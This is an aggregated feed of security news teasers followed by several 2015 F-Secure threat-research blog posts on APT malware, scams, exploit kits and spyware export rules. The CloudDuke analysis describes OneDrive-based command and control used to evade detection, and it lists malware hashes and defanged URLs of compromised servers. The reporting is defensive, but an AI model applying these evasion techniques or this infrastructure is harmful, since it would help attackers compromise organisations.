The post Google files lawsuit against Lighthouse ‘phishing for dummies’ text scammers appeared first on CyberScoop.

Anthropic: China-backed hackers launch first large-scale autonomous AI cyberattack

China-linked actors used Anthropic’s AI to automate and run cyberattacks in a sophisticated 2025 espionage campaign using advanced agentic tools. China-linked threat actors used Anthropic’s AI to automate and execute cyberattacks in a highly sophisticated espionage campaign in September 2025. The cyber spies leveraged advanced “agentic” capabilities rather than using AI only for guidance. Attackers […]

Multiple Vulnerabilities in GoSign Desktop lead to Remote Code Execution

Researchers found a critical vulnerability in GoSign Desktop: TLS Certificate Validation Disabled and Unsigned Update Mechanism. GoSign is an advanced and qualified electronic signature solution developed by Tinexta InfoCert S.p.A., used by public administrations, businesses, and professionals to manage approval workflows with traceability and security. The SaaS/web version of the product has received the “QC2” […]

U.S. CISA adds Fortinet FortiWeb flaw to its Known Exploited Vulnerabilities catalog

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Fortinet FortiWeb flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a Fortinet FortiWeb flaw, tracked as CVE-2025-64446  (CVSS score of 9.1), to its Known Exploited Vulnerabilities (KEV) catalog. The vulnerability is a relative path traversal issue in Fortinet FortiWeb 8.0.0 […]

Critical CVE-2025-59367 flaw lets hackers access ASUS DSL routers remotely

ASUS fixed a critical auth-bypass flaw (CVE-2025-59367) in DSL routers that let remote, unauthenticated attackers access devices with ease. ASUS patched a critical auth-bypass flaw, tracked as CVE-2025-59367 (CVSS score of 9.3), in multiple DSL routers that allows remote, unauthenticated attackers to easily access unpatched devices. The vulnerability impacts DSL-AC51, DSL-N16, DSL-AC750 router families, the […]

Millions of sites at risk from Imunify360 critical flaw exploit

A vulnerability affecting Imunify360 lets attackers run code via malicious file uploads, risking millions of websites. A vulnerability in ImunifyAV/Imunify360 allows attackers to upload malicious files to shared servers and execute arbitrary code, potentially exposing millions of websites, cybersecurity firm Patchstack warns. The flaw in Imunify360 AV before v32.7.4.0 lets attacker‑supplied malware trigger dangerous PHP […]

Critical FortiWeb flaw under attack, allowing complete compromise

A Fortinet FortiWeb auth-bypass flaw is being actively exploited, allowing attackers to hijack admin accounts and fully compromise devices. Researchers warn of an authentication bypass flaw in Fortinet FortiWeb WAF that allows full device takeover. The cybersecurity vendor addressed the vulnerability with the release version 8.0.2. A security flaw lets anyone break into FortiWeb devices […]

Germany’s BSI issues guidelines to counter evasion attacks targeting LLMs

Germany’s BSI warns of rising evasion attacks on LLMs, issuing guidance to help developers and IT managers secure AI systems. Germany’s BSI warns of rising evasion attacks on LLMs, issuing guidance to help developers and IT managers secure AI systems and mitigate related risks. A significant and evolving threat to AI systems based on large […]

Washington Post notifies 10,000 individuals affected in Oracle-linked data theft

The Washington Post alerts nearly 10,000 employees and contractors that personal and financial data was exposed in the Oracle breach. The Washington Post warns nearly 10,000 staff and contractors that personal and financial data was exposed in the Oracle breach. The popular newspaper has approximately 2.5M digital subscribers. Between July 10 and August 22, threat […]

Chrome extension “Safery” steals Ethereum wallet seed phrases

Malicious Chrome extension “Safery: Ethereum Wallet” steals users’ seed phrases while posing as a legit crypto wallet still available online. Socket’s Threat Research Team discovered a malicious Chrome extension called “Safery: Ethereum Wallet,” posing as a legitimate crypto wallet but designed to steal users’ seed phrases. The Chrome extension was uploaded to the Chrome Web […]

A new round of Europol’s Operation Endgame dismantled Rhadamanthys, Venom RAT, and Elysium botnet

Europol’s Operation Endgame dismantles Rhadamanthys, Venom RAT, and Elysium botnet in a global crackdown on cybercriminal infrastructures. Europol and Eurojust have launched a new phase of Operation Endgame, carried out between November 10 and 13, 2025, dismantling major malware families including Rhadamanthys Stealer, Venom RAT, and the Elysium botnet as part of a global effort […]

Keeper Security Unveils Secure Secrets Management in Visual Studio Code

Keeper Security has announced the launch of its Visual Studio Code (VS Code) extension, extending its enterprise-grade secrets management directly into developers’ coding environments. The VS Code extension expands the KeeperPAM® platform’s reach into the developer ecosystem, enabling secure, zero-trust secrets management throughout the software development lifecycle. Effective secrets management is vital for developers, as […]

The post Keeper Security Unveils Secure Secrets Management in Visual Studio Code appeared first on IT Security Guru.

What Will Defense Contracting Look Like in 10 Years?

Global defense spending will reach $6.38 trillion by 2035, growing from $2.7 trillion in 2024 at a compound annual growth rate of 8.13%, according to Spherical Insights & Consulting research. This massive expansion coincides with fundamental shifts in how the U.S. government procures defense capabilities and manages contractor relationships. Margarita Howard, CEO and owner of […]

The post What Will Defense Contracting Look Like in 10 Years? appeared first on IT Security Guru.

Black Duck SCA Adds AI Model Scanning to Strengthen Software Supply Chain Security

Black Duck has expanded its software composition analysis (SCA) capabilities to include AI model scanning, helping organisations gain visibility into the growing use of open-source AI models embedded in enterprise software. With the release of version 2025.10.0, the company’s new AI Model Risk Insights capability allows teams to identify and analyse AI models used within […]

The post Black Duck SCA Adds AI Model Scanning to Strengthen Software Supply Chain Security appeared first on IT Security Guru.

Quantum Route Redirect: The Phishing Tool Simplifying Global Microsoft 365 Attacks

The team at KnowBe4 Threat Labs has uncovered an emerging advanced phishing campaign targeting Microsoft 365 users globally to steal their credentials. This powerful new phishing kit, which KnowBe4 have named ‘Quantum Route Redirect’, was initially discovered in early August. Quantum Route Redirect comes with a pre-configured set up and phishing domains that significantly simplifies […]

The post Quantum Route Redirect: The Phishing Tool Simplifying Global Microsoft 365 Attacks appeared first on IT Security Guru.

Staying Safe After a Cyber Attack

One minute, everything’s fine. The next? Something feels off. Maybe there’s an unfamiliar charge on your bank account, or an email says your password has been changed, except you didn’t do it. Or perhaps your social media starts posting things you’ve never written. The first reaction is disbelief. Then confusion. Then fear. Take a breath. […]

The post Staying Safe After a Cyber Attack appeared first on IT Security Guru.

Keeper Security launches Forcefield to defend against memory-based attacks on Windows devices

Keeper Security has unveiled Keeper Forcefield™, a new kernel-level endpoint security product designed to stop one of the fastest-growing cyber threats: memory-based attacks. The company, known for its zero-trust and zero-knowledge Privileged Access Management (PAM) platform, says Forcefield is the first solution to deliver real-time memory protection at both the user and kernel levels, offering […]

The post Keeper Security launches Forcefield to defend against memory-based attacks on Windows devices appeared first on IT Security Guru.

How Defence Contractors Are Fortifying Security Camera Networks For High-Stakes Live Events

In an era where security threats, hacks, and even assisination attempts at major political events have become an urgent concern, Active Security has taken a fundamentally different approach to protecting large, stadium-level gatherings: building high-fidelity camera networks where compromising one device doesn’t give attackers access to everything else. These networks are designed to integrate seamlessly […]

The post How Defence Contractors Are Fortifying Security Camera Networks For High-Stakes Live Events appeared first on IT Security Guru.

Nearly Three-Quarters of US CISOs Faced Significant Cyber Incident in the Past Six Months, Research Finds

A new research report from Nagomi Security has revealed that, over the past six months, nearly three quarters (73%) of US CISOs have reported a significant cyber incident. The 2025 CISO Pressure Index emphasises how continuous widespread breaches and rising internal strain are reshaping the Chief Information Security Officer (CISO) role. Nagomi’s 2025 CISO Pressure Index […]

The post Nearly Three-Quarters of US CISOs Faced Significant Cyber Incident in the Past Six Months, Research Finds appeared first on IT Security Guru.

Arnica’s Arnie AI Reimagines Application Security For The Agentic Coding Era

As software development enters an era dominated by autonomous coding agents, application security programs are finding themselves structurally unprepared. AI models that generate and modify production code on demand can push thousands of changes per day, far beyond what traditional AppSec pipelines were built to handle. Arnica has stepped into this gap with Arnie AI, […]

The post Arnica’s Arnie AI Reimagines Application Security For The Agentic Coding Era appeared first on IT Security Guru.

New Forescout report finds 65% of connected assets are outside traditional IT visibility

Forescout® Technologies, a global leader in cybersecurity, has announced the launch of eyeSentry, a new cloud-native exposure management solution designed to help enterprises continuously uncover and mitigate hidden risks across IT, Internet of Things (IoT), and Internet of Medical Things (IoMT) environments. As organisations continue to embrace hybrid and cloud infrastructures, traditional vulnerability management methods […]

The post New Forescout report finds 65% of connected assets are outside traditional IT visibility appeared first on IT Security Guru.

Tycoon 2FA Phishing Kit Analysis

The Tycoon 2FA phishing kit is a sophisticated Phishing-as-a-Service (PhaaS) platform that emerged in August 2023, designed to bypass two-factor authentication (2FA) and multi-factor authentication (MFA) protections, primarily targeting Microsoft 365 and Gmail accounts. Utilizing an Adversary-in-the-Middle (AiTM) approach, it employs a reverse proxy server to host deceptive phishing pages that mimic legitimate login interfaces, capturing user credentials and session cookies in real-time. According to the Any.run malware trends tracker, Tycoon 2FA leads with over 64,000 reported incidents this year.

From Scripts to Systems: A Comprehensive Look at Tangerine Turkey Operations

Cybereason Security Services issue Threat Analysis reports to inform on impacting threats. The Threat Analysis reports investigate these threats and provide practical recommendations for protecting against them.

In this Threat Analysis report, Cybereason Security Services investigates the flow of a Tangerine Turkey campaign observed in Cybereason EDR. Tangerine Turkey is a threat actor identified as a visual basic script (VBS) worm used to facilitate cryptomining activity.

Cybereason TTP Briefing Q3 2025: LOLBINs and CVE Exploits Dominate

Explore the latest trends, techniques, and procedures (TTPs) our incident response (IR) experts are actively facing with the TTP Briefing Q3 2025, a report built on frontline threat intelligence from our global incident response investigations, enriched by noteworthy detections from our SOC. 

Addressing CL0P Extortion Campaign Targeting Oracle EBS CVE-2025-61882

Overview and What Cybereason Knows So Far

• July 2025, Oracle releases security updates including 309 patches, which included nine that addressed flaws/vulnerabilities in Oracle E-Business Suite (EBS).
• July 2025 (end of) through September 2025 (beginning of), Cybereason has assessed based on emerging evidence and ongoing forensic investigations, that CL0P orchestrated an Intrusion Path that allowed for unauthorized access to on-premise, customer-managed Oracle E-Business Suite (EBS) solutions, enumerated accessible and stored data, and conducted data exfiltration.
• September 2025 (end of) through October 2025 (beginning of), a widespread orchestrated email extortion campaigns emerged targeting users of on-premise, customer-managed Oracle E-Business Suite (EBS) and requesting contact with CL0P in order to not expose data allegedly exfiltrated.
• October 2025 (beginning of), Cybereason is aware of ongoing investigations in which CL0P has provided proof of data. CL0P does not appear to have named new victims associated with this incident as of October 4, 2025.
• October 5, 2025, Oracle confirms CVE-2025-61882 in Oracle E-Business Suite (EBS). This vulnerability was remotely exploitable without authentication (i.e., it can be exploited over a network without the need for a username and password). Successful exploitation can lead to remote code execution (RCE).
• October 7, 2025, Cybereason confirms earliest evidence of threat actor activity occurred August 9, but is subject to change based on ongoing investigations. 

7000+ IRs Later: The 11 Essential Cybersecurity Controls

Decades in incident response reveal battle-tested cybersecurity controls that minimize attack surface, improve detection and response, reduce incident impact and losses, and build cyber resilience (with compliance mappings for easy implementation).

Behind the Mask of Madgicx Plus: A Chrome Extension Campaign Targeting Meta Advertisers

Cybereason Security Services recently analyzed an investigation into a broader malicious Chrome extension campaign, part of which had been previously documented by DomainTools. While earlier iterations of this campaign involved the impersonation a variety of services, the latest version shifts focus to Meta (Facebook/Instagram) advertisers through a newly crafted lure: “Madgicx Plus,” a fake AI-driven ad optimization platform. Promoted as a tool to streamline campaign management and boost ROI using artificial intelligence, the extension instead delivers potentially malicious functionalities capable of hijacking business sessions, stealing credentials, and compromising Meta Business accounts. Notably, several domains associated with earlier parts of the campaign have been repurposed to promote this new theme, highlighting the operators’ tendency to recycle infrastructure while adapting their social engineering strategy to new targets.

CVE-2025-53770 & CVE-2025-53771: Critical On-Prem SharePoint Vulnerabilities

Key Takeaways

• Two zero-day vulnerabilities discovered in on-premise Microsoft SharePoint servers, tracked as CVE‑2025‑53770 and CVE‑2025‑53771.
• Affected versions include: Subscription Edition – KB5002768, SharePoint 2019 – KB5002754, SharePoint 2016 – KB5002760. 
• If exploited, these vulnerabilities could allow for remote code execution (RCE). 
• Cybereason has observed ongoing active exploitation attempts of these vulnerabilities through our Global SOC monitoring. 
• With this exploit, we recommend taking an “assume compromised” posture, immediately patching impacted versions, and conducting incident response historical look back. 

BlackSuit: A Hybrid Approach with Data Exfiltration and Encryption

Cybereason Security Services issue Threat Analysis reports to inform on impacting threats. The Threat Analysis reports investigate these threats and provide practical recommendations for protecting against them.

Deploying NetSupport RAT via WordPress & ClickFix

In May 2025, Cybereason Global Security Operations Center (GSOC) detected that threat actors have been hosting malicious WordPress websites to deliver malicious versions of the legitimate NetSupport Manager Remote Access Tool (RAT). 

Introducing the Cybereason TTP Briefing: Frontline Threat Intelligence Insights

Gain insight into the latest attack trends, techniques, and procedures our Incident Response experts are actively facing with the brand new TTP Briefing, a report built on frontline threat intelligence from our global incident response (IR) investigations, enriched by noteworthy detections from our SOC. 

How to spot a holiday shopping scam: Fake deals, trick surveys & bogus gift cards

Scammers, fraudsters, and phishers take advantage of every season. But the holiday shopping season - which includes Black Friday, Cyber Monday, and Christmas - may be their favorite.

As retailers rush to capitalize on what is generally their most profitable time of year, they will generally flood email boxes with great offers that are often time sensitive and may even seem too-good-to-be-true. Meanwhile, consumers also feel the urgency to get their shopping done, along with the stresses of work and family. Add in the financial pressure of an inflationary economy and the likelihood of making a quick mistake keeps increasing. Read on for some simple yet effective ways to ruin the scammers' fun as you celebrate the season of giving.

Soon�

Posted by Sean @ 12:52 GMT

Our "construction project" is progressing nicely.



And it should resolve this…



Fix mobile usability issues?

Translation: your site doesn't help us sell more Android phones and ads.

But whatever, the "issues" should be fixed soon enough.

On 18/08/15 At 12:52 PM

Work In Progress

Posted by Sean @ 13:25 GMT

Regular readers will have noticed it's been slow here of late.


Under Construction

We're finally undertaking an upgrade from Greymatter 1.7.3. This may be the world's oldest Greymatter blog… that will now change.

More info coming soon.

In the meantime, you can still catch us on Twitter.

On 13/08/15 At 01:25 PM

"IOS Crash Report" Update: Safari Adds Block Feature

Posted by Sean @ 09:53 GMT

Ask, and sometimes, you shall receive.

Last Friday, we wrote about call center scammers targeting iOS. And today, Apple released a new (beta) feature that should help.

Apple released iOS 9 Public Beta 2:



And it appears that one of Safari's new features allows people to block fraud-focused JavaScript.



We tested a scam-site and after a few attempts to dismiss the JavaScript dialog, Safari included a prompt to "Block Alerts". We were then easily able to close the page.

Kudos Apple! Looking forward to seeing this in iOS 9's general release.

Big hat tip to Rosyna Keller.

On 23/07/15 At 09:53 AM

Duke APT group's latest tools: cloud services and Linux support

Posted by Artturi @ 11:59 GMT

Recent weeks have seen the outing of two new additions to the Duke group's toolset, SeaDuke and CloudDuke. Of these, SeaDuke is a simple trojan made interesting by the fact that it's written in Python. And even more curiously, SeaDuke, with its built-in support for both Windows and Linux, is the first cross-platform malware we have observed from the Duke group. While SeaDuke is a single - albeit cross-platform - trojan, CloudDuke appears to be an entire toolset of malware components, or "solutions" as the Duke group apparently calls them. These components include a unique loader, downloader, and not one but two different trojan components. CloudDuke also greatly expands on the Duke group's usage of cloud storage services, specifically Microsoft's OneDrive, as a channel for both command and control as well as the exfiltration of stolen data. Finally, some of the recent CloudDuke spear-phishing campaigns have born a striking resemblance to CozyDuke spear-phishing campaigns from a year ago.

Linux support added with the cross-platform SeaDuke malware

Last week, both Symantec and Palo Alto Networks published research on SeaDuke, a newer addition to the arsenal of trojans being used by the Duke group. While older malware by the Duke group has always been written with a combination of the C and C++ programming languages as well as assembly language, SeaDuke is peculiarly written in Python with multiple layers of obfuscation. This Python code is usually then compiled into Windows executables using py2exe or pyinstaller. However, the Python code itself has been designed to work on both Windows and Linux. We therefore suspect, that the Duke group is also using the same SeaDuke Python code to target Linux victims. This is the first time we have seen the Duke group employ malware to target Linux platforms.


An example of the cross-platform support found in SeaDuke.

A new set of solutions with the CloudDuke malware toolset

Last week, we also saw Palo Alto Networks and Kaspersky Labs publish research on malware components they respectively called MiniDionis and CloudLook. MiniDionis and CloudLook are both components of a larger malware toolset we call CloudDuke. This toolset consists of malware components that provide varying functionality while partially relying on a shared code framework and always using the same loader. Based on PDB strings found in the samples, the malware authors refer to the CloudDuke components as "solutions" with names such as "DropperSolution", "BastionSolution" and "OneDriveSolution". A list of PDB strings we have observed is below:

� C:\DropperSolution\Droppers\Projects\Drop_v2\Release\Drop_v2.pdb
� c:\BastionSolution\Shells\Projects\miniDionis4\miniDionis\obj\Release\miniDionis.pdb
� c:\BastionSolution\Shells\Projects\miniDionis2\miniDionis\obj\Release\miniDionis.pdb
� c:\OneDriveSolution\Shells\Projects\OneDrive2\OneDrive\obj\x64\Release\OneDrive.pdb

The first of the CloudDuke components we have observed is a downloader internally called "DropperSolution". The purpose of the downloader is to download and execute additional malware on the victim's system. In most observed cases, the downloader will attempt to connect to a compromised website to download an encrypted malicious payload which the downloader will decrypt and execute. Depending on the way the downloader has been configured, in some cases it may first attempt to log in to Microsoft's cloud storage service OneDrive and retrieve the payload from there. If no payload is available from OneDrive, the downloader will revert to the previously mentioned method of downloading from compromised websites.

We have also observed two distinct trojan components in the CloudDuke toolset. The first of these, internally called "BastionSolution", is the trojan that Palo Alto Networks described in their research into "MiniDionis". Interestingly, BastionSolution appears to functionally be an exact copy of SeaDuke with the only real difference being the choice of programming language. BastionSolution also makes significant use of a code framework that is apparently internally called "Z". This framework provides classes for functionality such as encryption, compression, randomization and network communications.


A list of classes in the BastionSolution trojan, including multiple classes from the "Z" framework.

Classes from the same "Z" framework, such as the encryption and randomization classes, are also used by the second trojan component of the CloudDuke toolset. This second component, internally called "OneDriveSolution", is especially interesting because it relies on Microsoft's cloud storage service OneDrive as its command and control channel. To achieve this, OneDriveSolution will attempt to log into OneDrive with a preconfigured username and password. If successful, OneDriveSolution will then proceed to copy data from the victim's computer to the OneDrive account. It will also search the OneDrive account for files containing commands for the malware to execute.


A list of classes in the OneDriveSolution trojan, including multiple classes from the "Z" framework.

All of the CloudDuke "solutions" use the same loader, a piece of code whose primary purpose is to decrypt the embedded, encrypted solution, load it in memory and execute it. The Duke group has often employed loaders for their malware but unlike the previous loaders they have used, the CloudDuke loader is much more versatile with support for multiple methods of loading and executing the final payload as well as the ability to write to disk and execute additional malware components.

CloudDuke spear-phishing campaigns and similarities with CozyDuke

CloudDuke has recently been spread via spear-phishing emails with targets reportedly including organizations such as the US Department of Defense. These spear-phising emails have contained links to compromised websites hosting zip archives that contain CloudDuke-laden executables. In most cases, executing these executables will have resulted in two additional files being written to the victim's hard disk. The first of these files has been a decoy, such as an audio file or a PDF file while the second one has been a CloudDuke loader embedding a CloudDuke downloader, the so-called "DropperSolution". In these cases, the victim has been presented with the decoy file while in the background the downloader has proceeded to download and execute one of the CloudDuke trojans, "OneDriveSolution" or "BastionSolution".


Example of one of the decoy documents employed in the CloudDuke spear-phishing campaigns. It has apparently been copied by the attackers from here.

Interestingly, however, some of the other CloudDuke spear-phishing campaigns we have observed this July have born a striking resemblance to CozyDuke spear-phishing campaigns seen almost exactly a year ago, in the beginning of July 2014. In both spear-phishing campaigns, the decoy document has been the exact same PDF file, a "US letter fax test page" (28d29c702fdf3c16f27b33f3e32687dd82185e8b). Similarly, the URLs hosting the malicious files have, in both campaigns, purported to be related to eFaxes. It is also interesting to note, that in the case of the CozyDuke-inspired CloudDuke spear-phishing campaign, the downloading and execution of the malicious archive linked to in the emails has not resulted in the execution of the CloudDuke downloader but in the execution of the "BastionSolution" component thereby skipping one step from the process described for the other CloudDuke spear-phishing campaigns.


The "US letter fax test page" decoy employed in both CloudDuke and CozyDuke spear-phishing campaigns.

Increasingly using cloud services to evade detection

CloudDuke is not the first time we have observed the Duke group use cloud services in general and Microsoft OneDrive specifically as part of their operations. Earlier this spring we released research on CozyDuke where we mentioned observing CozyDuke sometimes either directly use a OneDrive account to exfiltrate stolen data or alternatively CozyDuke downloading Visual Basic scripts that would copy stolen files to a OneDrive account and sometimes even retrieve files containing additional commands from the same OneDrive account.

In these previous cases the Duke group has only used OneDrive as a secondary communication channel but still relied on more traditional C&C channels for most of their actions. It is therefore interesting to note that CloudDuke actually enables the Duke group to rely solely on OneDrive for every step of their operation from downloading the actual trojan, passing commands to the trojan and finally exfiltrating stolen data.

By relying solely on 3rd party web services, such as OneDrive, as their command and control channel, we believe the Duke group is trying to better evade detection. Large amounts of data being transferred from an organization's network to an unknown web server easily raises suspicions. However, data being transferred to a popular cloud storage service is normal. What better way for an attacker to surreptitiously transfer large amounts of stolen data than the same way people are transferring that same data every day for legitimate reasons. (Coincidentally, the implications of 3rd party web services being used as command and control channels is also the subject of an upcoming talk at the VirusBulletin 2015 conference).

Directing limited resources towards evading detection and staying ahead of defenders

Developing even a single multipurpose malware toolset, never mind many, requires time and resources. Therefore it seems logical to attempt to reuse code such as supporting frameworks between different toolsets. The Duke group, however, appear to have taken this a step further with SeaDuke and the CloudDuke component BastionSolution, by rewriting the same code in multiple programming languages. This has the obvious benefits of saving time and resources by providing two malware toolsets, that while similar on the inside, appear completely different on the outside. This way, the discovery of one toolset does not immediately lead to the discovery of the second toolset.

The Duke group, long suspected of ties to the Russian state, have been running their espionage operation for an unusually long time and - especially lately - with unusual brazenness. These latest CloudDuke and SeaDuke campaigns appear to be a clear sign that the Duke's are not planning to stop any time soon.

Research and post by Artturi (@lehtior2)

F-Secure detects CloudDuke as Trojan:W32/CloudDuke.B and Trojan:W64/CloudDuke.B

Samples:

04299c0b549d4a46154e0a754dda2bc9e43dff76
2f53bfcd2016d506674d0a05852318f9e8188ee1
317bde14307d8777d613280546f47dd0ce54f95b
476099ea132bf16fa96a5f618cb44f87446e3b02
4800d67ea326e6d037198abd3d95f4ed59449313
52d44e936388b77a0afdb21b099cf83ed6cbaa6f
6a3c2ad9919ad09ef6cdffc80940286814a0aa2c
78fbdfa6ba2b1e3c8537be48d9efc0c47f417f3c
9f5b46ee0591d3f942ccaa9c950a8bff94aa7a0f
bfe26837da22f21451f0416aa9d241f98ff1c0f8
c16529dbc2987be3ac628b9b413106e5749999ed
cc15924d37e36060faa405e5fa8f6ca15a3cace2
dea6e89e36cf5a4a216e324983cc0b8f6c58eaa8
e33e6346da14931735e73f544949a57377c6b4a0
ed0cf362c0a9de96ce49c841aa55997b4777b326
f54f4e46f5f933a96650ca5123a4c41e115a9f61
f97c5e8d018207b1d546501fe2036adfbf774cfd

Compromised servers used for command and control:

hxxps://cognimuse.cs.ntua.gr/search.php
hxxps://portal.sbn.co.th/rss.php
hxxps://97.75.120.45/news/archive.php
hxxps://portal.sbn.co.th/rss.php
hxxps://58.80.109.59/plugins/search.php

Compromised websites used to host CloudDuke:

hxxp://flockfilmseries.com/eFax/incoming/5442.ZIP
hxxp://www.recordsmanagementservices.com/eFax/incoming/150721/5442.ZIP
hxxp://files.counseling.org/eFax/incoming/150721/5442.ZIP

On 22/07/15 At 11:59 AM

'Zero Days', The Documentary

Posted by Mikko @ 12:40 GMT

VPRO (the Dutch public broadcasting organization) produced a 45-minute documentary about hacking and the trade of zero days. The documentary has now been released in English on YouTube.



The documentary features Charlie Miller, Joshua Corman, Katie Moussouris, Ronald Prins, Dan Tentler, Eric Rabe (of Hacking Team), Felix Lindner, Rodrigo Branco, Ben Nagy, The Grugq, and many others.

On 20/07/15 At 12:40 PM

IOS Crash Report: Blocking "Pop-Ups" Doesn't Really Help

Posted by Sean @ 10:15 GMT

The Telegraph published an article on Thursday about a scam targeting iOS users. Here's the gist: scammers are using JavaScript generated dialogs to display warnings of so-called "IOS Crash" reports prompting people to call for tech support. Near the end of the Telegraph's article, the following advice is offered:

"To prevent the issue happening again, go to Settings -> Safari -> Block Pop-ups."

Unfortunately, this advice is incorrect. And perhaps even more unfortunately, some security and tech pundits are now repeating the bad advice on numerous websites. How do we know the advice is wrong? Because we actually tested it…

First of all, this "IOS Crash Report" scam is a variation of the technical support scam, cases of which have been documented as early as 2008. In the past, cold-calls originated directly from call centers in India. But more recently, web-based lures are used to prompt potential victims into contacting the scammers.

A Google Search returns several live scam sites with this text:

"Due to a third party application in your phone, IOS is crashed."

Here's one of the sites as viewed with iOS Safari on an iPad:



Safari's "Fraudulent Website Warning" and "Block Pop-ups" features didn't prevent the page from loading.

What looks like a pop-up on the image above is actually a JavaScript generated dialog. One which will continuously re-spawn itself and can be very difficult to dismiss. Turning off JavaScript in Safari is the quickest way to regain control. Unfortunately, leaving JavaScript disabled will significantly impact a large number of legitimate websites.

Here's the same site as viewed with Google Chrome for Windows:



Notice the additional text in the image above: prevent this page from creating additional dialogs. Current versions of Chrome and Firefox (for Windows, at least) will inject this option into re-spawning dialogs, allowing the user to break the loop. Sadly, Internet Explorer and Safari do not. (We tested with IE for Windows / Windows Phone, and iOS Safari.)

Wouldn't be great if all browsers supported this prevention feature?

Yeah, we think so, too.

But it's not just browsers, apps with browser functionality can also be affected.

Here's an example of a JavaScript dialog displayed via Cydia.



The end of the Telegraph's article included the following advice from City of London police:

"Never give your iCloud username and password or your bank details to someone over the phone."

Indeed! Giving somebody your iCloud password could quickly turn a support scam into a data hijacking and extortion scheme. We attempted to call several of the scammer telephone numbers to see if they would ask for our iCloud credentials — only to discover that the numbers we tried are currently not in service.

Hopefully they stay that way. (They won't.)

On 17/07/15 At 10:15 AM

Hacking Team 0-day Flash Wave with Exploit Kits

Posted by Patricia @ 12:29 GMT

After Hacking Team was compromised, a lot of information were publicly disclosed beginning 5th of July, particularly its business clients and a zero-day vulnerability for the Adobe Flash Player that they have been using.

Since the info about the first zero-day was made freely available, we knew attackers would swiftly move into using it. As expected, the flash exploit was integrated into exploit kits such as Angler, Magnitude, Nuclear, Neutrino, Rig, and HanJuan as reported by Kafeine.

Based on our telemetry, there was a rise in Flash exploits beginning 6th and continued until 9th.




Here are the stats for each exploit kit:




The security advisory for CVE-2015-5119 zero-day was released on 7th July and the patch was made available on 8th. So the hits started to decline about two days after the patch.

But just when people have started updating their systems, there was yet another spike from the Angler flash exploit hits:




Apparently, two more flash vulnerabilities, CVE-2015-5122 and CVE-2015-5123, were discovered. These vulnerabilities are still waiting to be patched. According to Kafeine, one of the two vulnerabilities were added into the Angler exploit kit.

As a side note related to Angler exploit kit, if you noticed in the second chart above, Angler and HanJuan share the same statistics. This was due to the fact that our detections for Angler Flash exploits were also hitting on HanJuan Flash exploits.

We have verified this after discovering that there was a different URL pattern being detected by Angler:




We looked at the flash exploit used by both kits, and the two are very much identical.

Angler Flash Exploit:




HanJuan Flash Exploit:




There were already speculations that there seem to be strong connections between the actors behind the two exploits kits. For example, both have used �fileless� delivery of payload and even similar encryption methods. Perhaps at some point we will see HanJuan supporting this new flash 0 day as well.

In the meantime, since there hasn�t been a patch out yet for these new ones, our users remain protected from the effects of the exploit kits through Browsing Protection as well as these detections:

Exploit:SWF/AnglerEK.L
Exploit:SWF/NeutrinoEK.C
Exploit:SWF/NeutrinoEK.D
Exploit:SWF/NuclearEK.H
Exploit:SWF/NuclearEK.J
Exploit:SWF/Salama.H
Exploit:SWF/Salama.R
Exploit:JS/AnglerEK.D
Exploit:JS/NuclearEK.I
Exploit:JS/MagnitudeEK.A

UPDATE: Adobe has released patches for the recent two vulnerabilities: CVE-2015-5122 and CVE-2015-5123. Users are recommended to update to the latest version of Adobe Flash Player.

On 13/07/15 At 12:29 PM

The Trusted Internet: Who governs who gets to buy spyware from surveillance software companies?

Posted by FSLabs @ 02:31 GMT

When hackers get hacked, that's when secrets are uncovered. On July 5th, Italian-based surveillance technology company Hacking Team was hacked. The hackers released a 400GB torrent file with internal documents, source code, and emails to the public - including the company's client list of close to 60 customers.

The list included countries such as Sudan, Kazakhstan and Saudi Arabia - despite official company denials of doing business with oppressive regimes. The leaked documents strongly implied that in the South-East Asian region, government agencies from Singapore, Thailand and Malaysia had purchased their most advanced spyware, referred to as a Remote Control System (RCS).

According to security researchers Citizen Lab, this spyware is extraordinarily intrusive, with the ability to turn on microphone and cameras on mobile devices, intercept Skype and instant messages, and use an anonymizer network of proxy servers to prevent harvested information from being traced back to the command and control servers.

Based on images of the client list posted to pastebin the software was purchased in Malaysia by the Malaysia Anti-Corruption Commission (MACC), Malaysia Intelligence (MI) and the Prime Minister's Office (PMO):



Additional images of leaked invoices posted to medium.com indicated the spyware was sold through a locally-based Malaysian company named Miliserv Technologies (M) Sdb Bhd (registered with the Ministry of Finance Malaysia), which specializes in providing digital forensics, intelligent gathering and public security services:





Why the Prime Minister's Office would need surveillance software remains puzzling. Mind you, professional grade spyware ain't cheap - a license upgrade could cost you MYR400, 000 and maintenance renewal will set you back about MYR160,000.

According to reports of the incident in Malaysian alternative media, Malaysian government agencies have probably been using the spyware even before discovery of the FinFisher malware that was detected in the run-up to the 2013 General Elections.

Coincidentally, Malaysia has also been the frequent host of the annual ISS World Asia tradeshow, where companies promote their arsenal of 'lawful' surveillance software to law enforcement agencies, telco service provider or government employees. During the 2014 event, the Hacking Team was present and the associate lead sponsor of the event.

MiliServ Technologies is currently involved in the upcoming 2015 ISS World Asia in Kuala Lumpur. The event is invitation-only � though it may be interesting to see if Hacking Team will make it there this year.


Post by – Su Gim

On 08/07/15 At 02:31 AM

Problematic Wassenaar Definitions

Posted by Sean @ 13:25 GMT

The Wassenaar Arrangement, a multilateral export control regime, defines "intrusion software" as software specially designed or modified to avoid detection by monitoring tools, or to defeat protective countermeasures, of a computer or network capable device. Intrusion software is used to: extract data or information, or to modify system or user data; or to modify the standard execution path of a program or process in order to allow the execution of externally provided instructions.

Wassenaar states that monitoring tools are software or hardware devices that monitor system behaviours or processes running on a device. This includes antivirus (AV) products, end point security products, Personal Security Products (PSP), Intrusion Detection Systems (IDS), Intrusion Prevention Systems (IPS) or firewalls.


(Source)


So… what we at F-Secure (and the rest of the antivirus industry) call "malware" appears to easily fit Wassenaar's definition of intrusion software.

Why is this interesting?

Well, the US Bureau of Industry and Security (BIS), part of the US Department of Commerce, has proposed updating its rules to require a license for the export of intrusion software.

And according to the Dept of Commerce, "an export" is –any– item that is sent from the United States to a foreign destination. "Items" include among other things, software and technology.

The Paradox

So… if malware is intrusion software, and any item is an export, how exactly are US-based customers supposed to submit a malware sample to their European antivirus vendor? Seriously, customers send us zero-day using malware all the time. Not to mention the samples that we routinely exchange with other trusted AV vendors from around the globe.

Unintended Consequences

